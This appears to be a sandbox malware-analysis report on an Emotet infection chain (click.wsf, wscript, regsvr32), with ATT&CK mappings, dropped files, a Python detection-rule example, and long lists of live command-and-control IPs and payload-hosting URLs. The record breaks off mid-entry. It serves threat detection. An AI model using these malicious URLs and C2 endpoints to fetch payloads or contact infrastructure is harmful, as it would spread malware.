        Source: regsvr32.exe, 00000004.00000003.1868438531.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_000000018000A878 GetProcessHeap
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00000001800082EC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00000001800017DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\System32\wscript.exe | File created: rad75349.tmp.dll.1.dr
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 164.90.222.65 443
        Source: C:\Windows\System32\wscript.exe | Network Connect: 31.31.196.172 443
        Source: C:\Windows\System32\wscript.exe | Network Connect: 186.202.153.5 443
        Source: C:\Windows\System32\wscript.exe | Network Connect: 203.26.41.131 443
        Source: C:\Windows\System32\wscript.exe | Domain query: penshorn.org
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 66.228.32.31 7080
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 187.63.160.88 80
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 104.168.155.143 8080
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 91.121.146.47 8080
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 160.16.142.56 8080
        Source: C:\Windows\System32\wscript.exe | Domain query: www.gomespontes.com.br
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 182.162.143.56 443
        Source: C:\Windows\System32\wscript.exe | Domain query: bbvoyage.com
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 167.172.199.165 8080
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 163.44.196.120 8080
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll
        Source: C:\Windows\System32\regsvr32.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00000001800070A0 cpuid
        Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180001D98 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter

        Stealing of Sensitive Information

        Source: Yara match | File source: 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 3.2.regsvr32.exe.460000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.regsvr32.exe.460000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.1501910088.0000000000460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | 12 Scripting | 1 DLL Side-Loading | 111 Process Injection | 21 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | 1 Exploitation for Client Execution | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 121 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 111 Process Injection | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 3 Ingress Tool Transfer | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 12 Scripting | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 4 Non-Application Layer Protocol | SIM Card Swap |  | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Hidden Files and Directories | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | 115 Application Layer Protocol | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Obfuscated Files or Information | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Regsvr32 | DCSync | 24 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
Behavior graph (ID 830321, sample click.wsf, start date 20/03/2023, architecture WINDOWS, score 100), written out as the process chain the graph draws:

Analysis root
• Network: 129.232.188.93 (xneelo, ZA, South Africa); 45.235.8.30 (WIKINET TELECOMUNICACOES, BR, Brazil); 37 other IPs or domains
• Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 4 other signatures
• Started: wscript.exe, OUTLOOK.EXE

wscript.exe (hosts click.wsf)
• Network: gomespontes.com.br 186.202.153.5:443, local port 49729 (Locaweb Servicos de Internet SA, BR, Brazil); penshorn.org 203.26.41.131:443, local port 49727 (Dreamscape Networks Limited, AU, Australia); 2 other IPs or domains
• Dropped: C:\Users\user\Desktop\rad75349.tmp.dll (PE32+); C:\Users\user\Desktop\rad1F9A4.tmp.dll (HTML, not a PE); C:\Users\user\Desktop\click.wsf (ASCII)
• Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; VBScript performs obfuscated calls to suspicious functions
• Started: regsvr32.exe

OUTLOOK.EXE (the one pre-existing process the analysis covers)
• Network: 52.109.13.63:443, local port 49720, and 52.109.76.141:443, local port 49717 (MICROSOFT-CORP-MSN-AS-BLOCK, US); 192.229.221.95, local ports 49707, 49716, 49724 (EDGECAST, US). All three addresses are rated non-malicious in the IP table below, so this traffic is analysis-environment noise rather than part of the infection chain.

regsvr32.exe (first instance, started by wscript.exe)
• Dropped: C:\Windows\System32\...\xhwdmo.dll (copy) (PE32+)
• Signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
• Started: regsvr32.exe

regsvr32.exe (second instance, started by the first)
• Network: 160.16.142.56:8080 (SAKURA Internet Inc, JP, Japan); 91.121.146.47:8080, local port 49731 (OVH, FR, France); 7 other IPs or domains
• Signatures: System process connects to network (likely due to code injection or exploit)
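The chain the graph records (a script host drops a DLL on the Desktop, hands it to regsvr32.exe, the loaded DLL installs a copy under a freshly named System32 subdirectory, and a child regsvr32.exe beacons to bare IP addresses on port 8080) is what a detection engineer would turn into telemetry rules. The Python below is an added example, not part of the Joe Sandbox report or of any Joe Security tooling: it runs four rules plus a parent-chain correlation over a small set of constructed Sysmon-style events (event IDs 1, 11 and 3). The file names, paths and C2 addresses in the events are taken from the report; the PIDs, parent images, command lines and the field layout are assumptions.

```python
"""Detection rules for the click.wsf -> regsvr32.exe -> Emotet chain.

Added example, not from the Joe Sandbox report. EVENTS is constructed
telemetry in a Sysmon-like shape (id 1 = process create, 11 = file create,
3 = network connect). Paths, file names and C2 addresses come from the
report's behaviour graph; PIDs, parents, command lines and field names
are assumptions.
"""
import ipaddress
import ntpath
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
LOLBIN_LOADERS = {"regsvr32.exe", "rundll32.exe"}
WEB_PORTS = {80, 443}
SYSTEM32 = r"c:\windows\system32"

WSCRIPT = r"C:\Windows\System32\wscript.exe"
REGSVR32 = r"C:\Windows\System32\regsvr32.exe"
OUTLOOK = r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"

EVENTS = [  # constructed; mirrors the behaviour graph of analysis 830321
    {"id": 1, "pid": 4120, "ppid": 3988, "image": WSCRIPT, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\click.wsf"'},
    {"id": 11, "pid": 4120, "image": WSCRIPT, "target": r"C:\Users\user\Desktop\rad1F9A4.tmp.dll"},
    {"id": 11, "pid": 4120, "image": WSCRIPT, "target": r"C:\Users\user\Desktop\rad75349.tmp.dll"},
    {"id": 1, "pid": 5016, "ppid": 4120, "image": REGSVR32, "parent": WSCRIPT,
     "cmdline": r'regsvr32.exe "C:\Users\user\Desktop\rad75349.tmp.dll"'},
    {"id": 11, "pid": 5016, "image": REGSVR32, "target": r"C:\Windows\System32\BlUwZJEPejvMeG\xhwdmo.dll"},
    {"id": 1, "pid": 5240, "ppid": 5016, "image": REGSVR32, "parent": REGSVR32,
     "cmdline": r'regsvr32.exe "C:\Windows\System32\BlUwZJEPejvMeG\xhwdmo.dll"'},
    {"id": 3, "pid": 5240, "image": REGSVR32, "dst_ip": "160.16.142.56", "dst_port": 8080},
    {"id": 3, "pid": 5240, "image": REGSVR32, "dst_ip": "91.121.146.47", "dst_port": 8080},
    # Benign noise that the report also records: Outlook talking to Microsoft over 443.
    {"id": 1, "pid": 2200, "ppid": 3988, "image": OUTLOOK, "parent": r"C:\Windows\explorer.exe",
     "cmdline": '"' + OUTLOOK + '"'},
    {"id": 3, "pid": 2200, "image": OUTLOOK, "dst_ip": "52.109.13.63", "dst_port": 443},
]


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def is_public(ip: str) -> bool:
    a = ipaddress.ip_address(ip)
    return not (a.is_private or a.is_loopback or a.is_link_local or a.is_multicast or a.is_reserved)


def detect(events):
    """Run the rules over events in order; returns findings in firing order."""
    findings = []
    parent_of, image_of, dropper_pids = {}, {}, set()

    for e in events:
        img = basename(e["image"])
        if e["id"] == 1:
            parent_of[e["pid"]] = e["ppid"]
            image_of[e["pid"]] = img
            # Rule: a LOLBin loader told to load a DLL that lives under a user profile
            # (the report's Sigma hit "Run temp file via regsvr32").
            m = re.search(r'[A-Za-z]:\\Users\\[^"]+?\.dll', e["cmdline"], re.I)
            if img in LOLBIN_LOADERS and m:
                findings.append(Finding("lolbin_loads_user_dll", e["pid"],
                                        f"{img} loads {m.group(0)}, parent {basename(e['parent'])}"))
        elif e["id"] == 11:
            target = e["target"].lower()
            # Rule: a script host writing a DLL into a user profile.
            if img in SCRIPT_HOSTS and target.endswith(".dll") and "\\users\\" in target:
                dropper_pids.add(e["pid"])
                findings.append(Finding("script_host_drops_dll", e["pid"], f"{img} wrote {e['target']}"))
            # Rule: a LOLBin loader creating System32\<newdir>\<name>.dll, the install
            # layout the report shows for xhwdmo.dll.
            if img in LOLBIN_LOADERS and target.startswith(SYSTEM32 + "\\") and target.endswith(".dll"):
                if len(target[len(SYSTEM32) + 1:].split("\\")) == 2:
                    findings.append(Finding("lolbin_installs_system32_subdir_dll", e["pid"],
                                            f"{img} wrote {e['target']}"))
        elif e["id"] == 3:
            # Rule: a LOLBin loader with an outbound connection to a public address; the
            # tag separates the 8080/7080 beacons from ordinary web ports.
            if img in LOLBIN_LOADERS and is_public(e["dst_ip"]):
                tag = "web_port" if e["dst_port"] in WEB_PORTS else "nonstandard_port"
                findings.append(Finding(f"lolbin_outbound_{tag}", e["pid"],
                                        f"{img} -> {e['dst_ip']}:{e['dst_port']}"))

    # Correlation: walk each beaconing loader up its parent chain; if a script host
    # that dropped a DLL is an ancestor, report the chain once per (root, leaf) pair.
    chained = set()
    for f in findings:
        if f.rule.startswith("lolbin_outbound_"):
            pid, seen = f.pid, set()
            while pid in parent_of and pid not in seen:
                seen.add(pid)
                pid = parent_of[pid]
                if pid in dropper_pids:
                    chained.add((pid, f.pid))
                    break
    for root, leaf in sorted(chained):
        findings.append(Finding("script_to_regsvr32_c2_chain", root,
                                f"{image_of[root]} pid {root} dropped a DLL; descendant {image_of[leaf]} pid {leaf} beacons"))
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"{f.rule:40} pid={f.pid:<6} {f.detail}")
```

Run stand-alone it prints seven findings and nothing for the Outlook connection. The two single-event rules (script host writes a DLL, regsvr32 given a DLL under a user profile) fire on plenty of legitimate installers and are hunting signals; the chain rule, which needs a DLL-dropping script host in the ancestry of a beaconing regsvr32.exe, is the one that justifies an alert.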

Antivirus detection, initial sample (click.wsf): no matches
Antivirus detection, dropped files
Source                                                Detection  Scanner        Label
C:\Users\user\Desktop\rad75349.tmp.dll                79%        ReversingLabs  Win64.Trojan.Emotet
C:\Windows\System32\BlUwZJEPejvMeG\xhwdmo.dll (copy)  79%        ReversingLabs  Win64.Trojan.Emotet

Antivirus detection, unpacked PE files
Source                            Detection  Scanner  Label
3.2.regsvr32.exe.460000.0.unpack  100%       Avira    HEUR/AGEN.1215476

Antivirus detection, domains
Source                  Detection  Scanner
bbvoyage.com            9%         Virustotal
gomespontes.com.br      2%         Virustotal
penshorn.org            14%        Virustotal
www.gomespontes.com.br  5%         Virustotal
Antivirus detection, URLs
Avira URL Cloud rates 160.16.142.56:8080 as safe even though the behavior graph records the second regsvr32.exe beaconing to it on port 8080 and the IP table below marks it malicious; the behavioral evidence should take precedence over the per-URL reputation. Trailing characters after the final slash in several rows (vM, VnX, .DLL, 95DC4.tmp.dll() are most likely bytes that sat next to the URL when it was carved from process memory, not part of the path.

Source                                                           Detection  Scanner          Label
http://softwareulike.com/cWIYxWMPkK/                             100%       Avira URL Cloud  malware
http://wrappixels.co                                             0%         Avira URL Cloud  safe
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/H#K#0               100%       Avira URL Cloud  malware
https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/       0%         Avira URL Cloud  safe
https://160.16.142.56:8080/M                                     0%         Avira URL Cloud  safe
https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/VnX      100%       Avira URL Cloud  malware
https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/        100%       Avira URL Cloud  malware
https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/X      100%       Avira URL Cloud  malware
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/           100%       Avira URL Cloud  malware
https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/bK    100%       Avira URL Cloud  malware
https://104.168.155.143:8080/Y                                   100%       Avira URL Cloud  malware
https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/z     100%       Avira URL Cloud  malware
https://163.44.196.120:8080/                                     100%       Avira URL Cloud  malware
https://91.121.146.47:8080/                                      100%       Avira URL Cloud  malware
https://www.gomespontes.com.br/logs/pd/vM                        100%       Avira URL Cloud  malware
https://167.172.199.165:8080/l                                   100%       Avira URL Cloud  malware
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/cw34006    100%       Avira URL Cloud  malware
https://167.172.199.165:8080/                                    100%       Avira URL Cloud  malware
https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/dllgz  100%       Avira URL Cloud  malware
https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/         100%       Avira URL Cloud  malware
https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/      100%       Avira URL Cloud  malware
https://www.gomespontes.com.br/s                                 0%         Avira URL Cloud  safe
http://ozmeydan.com/cekici/9/                                    100%       Avira URL Cloud  malware
https://164.90.222.65/)                                          100%       Avira URL Cloud  malware
https://www.gomespontes.com.br/logs/pd/                          100%       Avira URL Cloud  malware
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM         100%       Avira URL Cloud  malware
https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz//      0%         Avira URL Cloud  safe
https://penshorn.org/admin/Ses8712iGR8du/tM                      100%       Avira URL Cloud  malware
https://104.168.155.143:8080/4                                   100%       Avira URL Cloud  malware
https://www.gomespontes.com.br/                                  0%         Avira URL Cloud  safe
https://164.90.222.65/wfqhlvcfruxkwghn/ivirkxueekmcz/            100%       Avira URL Cloud  malware
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM         100%       Avira URL Cloud  malware
https://167.172.199.165:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/     100%       Avira URL Cloud  malware
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/                    100%       Avira URL Cloud  malware
https://penshorn.org/admin/Ses8712iGR8du/                        100%       Avira URL Cloud  malware
http://softwareulike.com/cWIYxWMPkK/yM                           100%       Avira URL Cloud  malware
https://104.168.155.143:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/     100%       Avira URL Cloud  malware
https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/.DLL    100%       Avira URL Cloud  malware
http://ozmeydan.com/cekici/9/xM                                  100%       Avira URL Cloud  malware
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/dll                 100%       Avira URL Cloud  malware
https://104.168.155.143:8080/P                                   100%       Avira URL Cloud  malware
https://www.gomespontes.com.br/logs/pd/l                         100%       Avira URL Cloud  malware
https://104.168.155.143:8080/                                    100%       Avira URL Cloud  malware
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/           100%       Avira URL Cloud  malware
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM                  100%       Avira URL Cloud  malware
https://160.16.142.56:8080/                                      0%         Avira URL Cloud  safe
https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/       100%       Avira URL Cloud  malware
https://penshorn.org/admin/Ses8712iGR8du/95DC4.tmp.dll(          100%       Avira URL Cloud  malware
https://www.gomespontes.com.br/logs/pd/0w                        100%       Avira URL Cloud  malware
http://softwareulike.com/cWIYxWMPkK/_                            100%       Avira URL Cloud  malware
https://160.16.142.56:8080/)                                     0%         Avira URL Cloud  safe
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/476        100%       Avira URL Cloud  malware
Contacted domains (the Antivirus Detection column is empty for every row)
Name                    IP             Active   Malicious  Reputation
bbvoyage.com            31.31.196.172  true     true       unknown
gomespontes.com.br      186.202.153.5  true     true       unknown
penshorn.org            203.26.41.131  true     true       unknown
www.gomespontes.com.br  unknown        unknown  true       unknown
Contacted URLs
Name                                                    Malicious  Antivirus Detection       Reputation
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/  true       Avira URL Cloud: malware  unknown
https://www.gomespontes.com.br/logs/pd/                 true       Avira URL Cloud: malware  unknown
https://164.90.222.65/wfqhlvcfruxkwghn/ivirkxueekmcz/   true       Avira URL Cloud: malware  unknown
https://penshorn.org/admin/Ses8712iGR8du/               true       Avira URL Cloud: malware  unknown
URLs recovered from process memory
Each entry gives the URL, the process and memory dumps it was found in, the report's Malicious flag, the Avira URL Cloud verdict and the reputation. Memory dump identifiers are shortened to their first four fields; every identifier in the original ends with the same suffix, .00000004.00000020.00020000.00000000.sdmp.

http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/H#K#0
  Source: wscript.exe, 00000001.00000003.1417301254.000002D845C83000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

http://wrappixels.co
  Source: wscript.exe, 00000001.00000003.1542741778.000002D845C90000
  Malicious: true; Avira URL Cloud: safe; Reputation: unknown

http://softwareulike.com/cWIYxWMPkK/
  Source: wscript.exe, and wscript.exe memory dumps 00000001.00000003.1529404109.000002D8463EE000, 00000001.00000003.1521966849.000002D84626F000, 00000001.00000003.1548494229.000002D846412000, 00000001.00000003.1505842083.000002D845E4E000, 00000001.00000003.1526888779.000002D8462D5000, 00000001.00000003.1526294634.000002D84631A000, 00000001.00000003.1528804146.000002D8462B3000, 00000001.00000002.1552503322.000002D84653C000, 00000001.00000003.1530447488.000002D846461000, 00000001.00000003.1509441394.000002D845E4A000, 00000001.00000003.1507610198.000002D845DF6000, 00000001.00000003.1507946268.000002D845ED2000, 00000001.00000003.1548494229.000002D8463EE000, 00000001.00000003.1504930637.000002D8466C5000, 00000001.00000003.1514390296.000002D84600D000, 00000001.00000003.1507946268.000002D845EB1000, 00000001.00000003.1511499007.000002D845F4D000, 00000001.00000003.1527492027.000002D846291000, 00000001.00000003.1519488621.000002D846065000, 00000001.00000003.1507946268.000002D845E94000
  Malicious: true; Avira URL Cloud: malware; Reputation: unknown

https://160.16.142.56:8080/M
  Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000
  Malicious: false; Avira URL Cloud: safe; Reputation: unknown

https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
  Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000, 00000004.00000002.2661608245.0000000000D68000
  Malicious: false; Avira URL Cloud: safe; Reputation: unknown

https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/VnX
  Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/
  Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000, 00000004.00000003.2367342315.0000000000D58000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/X
  Source: regsvr32.exe, 00000004.00000003.1868438531.0000000000D08000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://104.168.155.143:8080/Y
  Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/bK
  Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://91.121.146.47:8080/
  Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000CFB000, 00000004.00000003.2367342315.0000000000CF6000, 00000004.00000003.1868438531.0000000000CE0000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://163.44.196.120:8080/
  Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/z
  Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://www.gomespontes.com.br/logs/pd/vM
  Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000, 00000001.00000003.1542741778.000002D845C90000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/cw34006
  Source: wscript.exe, 00000001.00000003.1531992780.000002D8464BA000, 00000001.00000002.1552238532.000002D8464BB000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://167.172.199.165:8080/l
  Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://167.172.199.165:8080/
  Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000, 00000004.00000003.2367342315.0000000000D58000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/dllgz
  Source: regsvr32.exe, 00000004.00000002.2660986060.0000000000C99000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/
  Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
  Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://www.gomespontes.com.br/s
  Source: wscript.exe, 00000001.00000002.1554710807.000002D846747000
  Malicious: false; Avira URL Cloud: safe; Reputation: unknown

http://ozmeydan.com/cekici/9/
  Source: wscript.exe, and wscript.exe memory dumps 00000001.00000003.1529404109.000002D8463EE000, 00000001.00000003.1521966849.000002D84626F000, 00000001.00000003.1548494229.000002D846412000, 00000001.00000003.1505842083.000002D845E4E000, 00000001.00000003.1526888779.000002D8462D5000, 00000001.00000003.1526294634.000002D84631A000, 00000001.00000003.1528804146.000002D8462B3000, 00000001.00000002.1552503322.000002D84653C000, 00000001.00000003.1530447488.000002D846461000, 00000001.00000003.1509441394.000002D845E4A000, 00000001.00000003.1507610198.000002D845DF6000, 00000001.00000003.1507946268.000002D845ED2000, 00000001.00000003.1548494229.000002D8463EE000, 00000001.00000003.1504930637.000002D8466C5000, 00000001.00000002.1553706057.000002D8466F1000, 00000001.00000003.1514390296.000002D84600D000, 00000001.00000003.1507946268.000002D845EB1000, 00000001.00000003.1511499007.000002D845F4D000, 00000001.00000003.1527492027.000002D846291000, 00000001.00000003.1519488621.000002D846065000
  Malicious: true; Avira URL Cloud: malware; Reputation: unknown

https://164.90.222.65/)
  Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D51000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM
  Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000, 00000001.00000003.1542741778.000002D845C90000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz//
  Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000
  Malicious: false; Avira URL Cloud: safe; Reputation: unknown

https://penshorn.org/admin/Ses8712iGR8du/tM
  Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000, 00000001.00000003.1542741778.000002D845C90000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://104.168.155.143:8080/4
  Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://www.gomespontes.com.br/
  Source: wscript.exe, 00000001.00000003.1537553114.000002D84656F000, 00000001.00000003.1542696917.000002D846570000, 00000001.00000003.1540601110.000002D846570000, 00000001.00000003.1534710579.000002D846568000, 00000001.00000003.1545756551.000002D846570000
  Malicious: true; Avira URL Cloud: safe; Reputation: unknown

https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM
  Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000, 00000001.00000003.1542741778.000002D845C90000
  Malicious: true; Avira URL Cloud: malware; Reputation: unknown

https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/.DLL
  Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000, 00000004.00000003.2367342315.0000000000D58000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/
  Source: wscript.exe, and wscript.exe memory dumps 00000001.00000003.1529404109.000002D8463EE000, 00000001.00000003.1521966849.000002D84626F000, 00000001.00000003.1548494229.000002D846412000, 00000001.00000003.1505842083.000002D845E4E000, 00000001.00000003.1526888779.000002D8462D5000, 00000001.00000003.1526294634.000002D84631A000, 00000001.00000003.1528804146.000002D8462B3000, 00000001.00000002.1552503322.000002D84653C000, 00000001.00000003.1530447488.000002D846461000, 00000001.00000003.1509441394.000002D845E4A000, 00000001.00000003.1507610198.000002D845DF6000, 00000001.00000003.1507946268.000002D845ED2000, 00000001.00000003.1548494229.000002D8463EE000, 00000001.00000003.1504930637.000002D8466C5000, 00000001.00000003.1514390296.000002D84600D000, 00000001.00000003.1507946268.000002D845EB1000, 00000001.00000003.1511499007.000002D845F4D000, 00000001.00000003.1527492027.000002D846291000, 00000001.00000003.1519488621.000002D846065000, 00000001.00000003.1507946268.000002D845E94000
  Malicious: true; Avira URL Cloud: malware; Reputation: unknown

http://softwareulike.com/cWIYxWMPkK/yM
  Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000, 00000001.00000003.1542741778.000002D845C90000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://167.172.199.165:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
  Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000
